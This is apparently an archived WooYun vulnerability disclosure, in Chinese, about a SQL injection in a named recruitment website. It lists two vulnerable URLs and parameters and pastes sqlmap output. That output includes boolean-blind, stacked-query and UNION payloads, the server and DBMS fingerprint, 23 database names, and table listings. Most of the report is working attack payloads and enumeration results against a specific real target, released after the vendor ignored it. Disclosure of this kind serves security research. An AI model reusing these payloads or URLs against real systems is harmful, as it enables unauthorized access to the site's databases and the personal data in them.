乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-13: 厂商已经主动忽略漏洞,细节向公众公开
RT
1.http://www.haorc.com/dangyuan/search.asp?fl=44
2.http://www.haorc.com/zdyj/zdnew.asp?newtype=0601&ai_rows=13&ai_length=28&n=%27
参数newtype
sqlmap resumed the following injection point(s) from stored session:---Parameter: fl (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fl=44 AND 4733=4733 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: fl=44;WAITFOR DELAY '0:0:5'-- Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: fl=-9912 UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(109)+CHAR(81)+CHAR(116)+CHAR(77)+CHAR(80)+CHAR(109)+CHAR(101)+CHAR(101)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(98)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[02:08:56] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000
available databases [23]:[*] $30year[*] $XABYSJYBD[*] $xarcfw[*] $zjgl[*] _article[*] _center[*] _jhdpc[*] _sysuser[*] _wjydj[*] fpbys[*] master[*] model[*] msdb[*] Northwind[*] PracticeBase[*] pubs[*] rc2[*] RSRC[*] sxbys[*] tempdb[*] XABYS_Test[*] xarc_info[*] xarc_web
Database: master[41 tables]+--------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || _article || _artuser || _log || _part || dtproperties || spt_datatype_info_ext || spt_datatype_info_ext || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_provider_types || spt_server_info || spt_values || sysconstraints || syslogins || sysoledbusers || sysopentapes || sysremotelogins || syssegments |+--------------------------------------------+
Database: Northwind[32 tables]+--------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories || Employees || Invoices || Region || Shippers || Suppliers || Territories || Alphabetical list of products || Category Sales for 1997 || Current Product List || Customer and Suppliers by City || Order Details Extended || Order Details Extended || Order Subtotals || Orders Qry || Orders Qry || Product Sales for 1997 || Products Above Average Price || Products Above Average Price || Products by Category || Quarterly Orders || Sales Totals by Amount || Sales by Category || Summary of Sales by Quarter || Summary of Sales by Year || dtproperties || sysconstraints || syssegments |+--------------------------------+
就这样吧,不深入
你懂得
未能联系到厂商或者厂商积极拒绝